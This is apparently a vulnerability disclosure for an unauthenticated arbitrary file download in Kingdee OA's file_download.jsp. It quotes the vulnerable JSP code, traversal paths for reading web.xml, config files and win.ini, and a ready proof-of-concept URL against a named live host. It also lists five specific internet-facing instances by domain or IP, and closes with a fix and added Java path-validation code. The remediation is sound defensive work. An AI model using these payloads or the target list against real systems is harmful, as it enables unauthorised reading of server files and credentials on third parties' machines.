Testing shows that this system has an arbitrary file download vulnerability, and it is reachable without logging in.
Vulnerable files:
/oa/admin/application/file_download.jsp?filePath=
http://x.x.x.x:7890/oa/fileDownload.do?type=File&path=/../webapp/WEB-INF/web.xml
Other paths that can be requested in the same way:
/../oaconsole/config/config.properties
c:\windows\win.ini
Part of the vulnerable code (file_download.jsp):
<%@ page import="java.util.Calendar,org.springside.core.Constants,cn.firstsoft.firstframe.admin.Environment"%><%
// filePath is taken straight from the request and never validated or confined to a directory.
String logPath = request.getParameter("filePath")==null?"D:\\KingdeeOA\\Tomcat_5.5\\logs\\catalina.2007-12-29.log ":request.getParameter("filePath");
// contentType and fileName are caller-controlled too and are written into the response headers as-is.
String contentType = request.getParameter("contentType")==null?"application/x-download":request.getParameter("contentType");
String fileName = request.getParameter("fileName")==null?"file.txt":request.getParameter("fileName");
java.io.OutputStream ou = null;
java.io.InputStream is = null;
try{
    // The only check is that the file exists, so any file the Tomcat user can read is served.
    java.io.File logFile = new java.io.File(logPath);
    if (logFile.exists()) {
        is = new java.io.FileInputStream(logPath);
        byte[] content = new byte[1024];
        int i = 0;
        response.setContentType(contentType);
        ou = response.getOutputStream();
        response.setHeader("Content-Disposition", "attachment; filename=\""+fileName+"\"");
        // Stream the whole file back to the caller.
        while ((i = is.read(content)) != -1) {
            ou.write(content, 0, i);
        }
        ou.flush();
    } else {
        // Echoes the requested path back, which also confirms whether a path exists.
        out.println("file not found:"+logPath);
    }
} catch (Exception e) {
    System.out.println(e);
} finally {
    if (ou != null) ou.close();
    if (is != null) is.close();
}
%>
A textbook arbitrary file download. Any instance found online will do as a proof of concept:
http://oa.xpngs.com/oa/admin/application/file_download.jsp?filePath=c:\windows\win.ini
Requesting the URL directly downloads the file; because no fileName parameter is supplied, it is saved under the default name file.txt.
Five affected instances:
http://oa.xpngs.com/oa/themes/mskin/login/login.jsp
http://newoa.qingyitang.com:7890/oa/themes/mskin/login/login.jsp
http://wt.zhengtongauto.com/oa/themes/mskin/login/login.jsp
http://113.106.196.36:7890/oa/themes/mskin/login/login.jsp?login_error=quit
http://www.jrxoa.com/oa/themes/mskin/login/login.jsp
Proof of vulnerability:
[screenshot: the downloaded file]
Fix:
Validate filePath before opening it: resolve it against a fixed download directory, canonicalize the result, and refuse anything that does not stay inside that directory (../ sequences and absolute paths such as c:\windows\win.ini). The fileName and contentType parameters are also taken straight from the request and should not be caller-controlled. The page should additionally require an authenticated session, since it is currently reachable without login.
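The following is an added example of that filtering, written for this write-up and not code from Kingdee OA or from the vulnerable page. It assumes a hypothetical base directory /opt/oa/downloads (the real layout is not known from the page) and shows the three checks the JSP is missing: confining the requested path to the base directory before the file is opened, re-checking after symlink resolution once the file is known to exist, and building Content-Disposition from the file's own name instead of the request. The main method runs the traversal strings quoted in this report as constructed probes.

```java
import java.io.IOException;
import java.nio.file.InvalidPathException;
import java.nio.file.Path;
import java.nio.file.Paths;

public class SafeFileDownload {

    // Assumption for the example: the only directory the endpoint may serve from.
    static final Path BASE_DIR = Paths.get("/opt/oa/downloads").toAbsolutePath().normalize();

    /** Returns the normalized path inside baseDir, or null when the request must be refused. */
    public static Path resolveSafely(Path baseDir, String requested) {
        if (requested == null || requested.trim().isEmpty()) {
            return null;
        }
        // Treat '\' like '/' so ..\..\ traversal and Windows-style paths are handled on any OS.
        String cleaned = requested.replace('\\', '/');
        // Absolute paths (Unix "/etc/passwd", Windows "c:/windows/win.ini") are never allowed.
        if (cleaned.startsWith("/") || cleaned.matches("(?i)^[a-z]:.*")) {
            return null;
        }
        Path candidate;
        try {
            candidate = baseDir.resolve(cleaned).normalize();   // collapses "." and ".." segments
        } catch (InvalidPathException e) {
            return null;   // e.g. an embedded NUL byte
        }
        // Component-wise prefix check: "/opt/oa/downloads2/x" does not start with "/opt/oa/downloads".
        if (!candidate.startsWith(baseDir)) {
            return null;
        }
        return candidate;
    }

    /** Second check once the file exists: follow symlinks and re-verify containment. */
    public static Path verifyRealPath(Path baseDir, Path candidate) throws IOException {
        Path real = candidate.toRealPath();
        Path realBase = baseDir.toRealPath();
        return real.startsWith(realBase) ? real : null;
    }

    /** Build Content-Disposition from the file's own basename, never from a request parameter. */
    public static String contentDisposition(Path file) {
        String name = file.getFileName().toString().replaceAll("[\"\\r\\n]", "_");
        return "attachment; filename=\"" + name + "\"";
    }

    public static void main(String[] args) {
        // Constructed probes, including the traversal strings quoted in the report above.
        String[] probes = {
            "report.txt",
            "sub/../report.txt",
            "../webapp/WEB-INF/web.xml",
            "../oaconsole/config/config.properties",
            "c:\\windows\\win.ini",
            "..\\..\\etc/passwd",
            "/etc/passwd",
        };
        for (String p : probes) {
            Path r = resolveSafely(BASE_DIR, p);
            System.out.println(p + " -> " + (r == null ? "REJECTED" : r));
        }
        // Only the first two probes are accepted; both resolve to /opt/oa/downloads/report.txt.
        System.out.println(contentDisposition(BASE_DIR.resolve("report.txt")));
    }
}
```

In the JSP this replaces the bare `new java.io.File(logPath)`: call resolveSafely first, return 404 on null, call verifyRealPath after the existence check, and use contentDisposition for the header. The explicit absolute-path check matters because on a Unix host `baseDir.resolve("c:/windows/win.ini")` is just a relative path that stays inside the base directory, so normalize and startsWith alone would let it through.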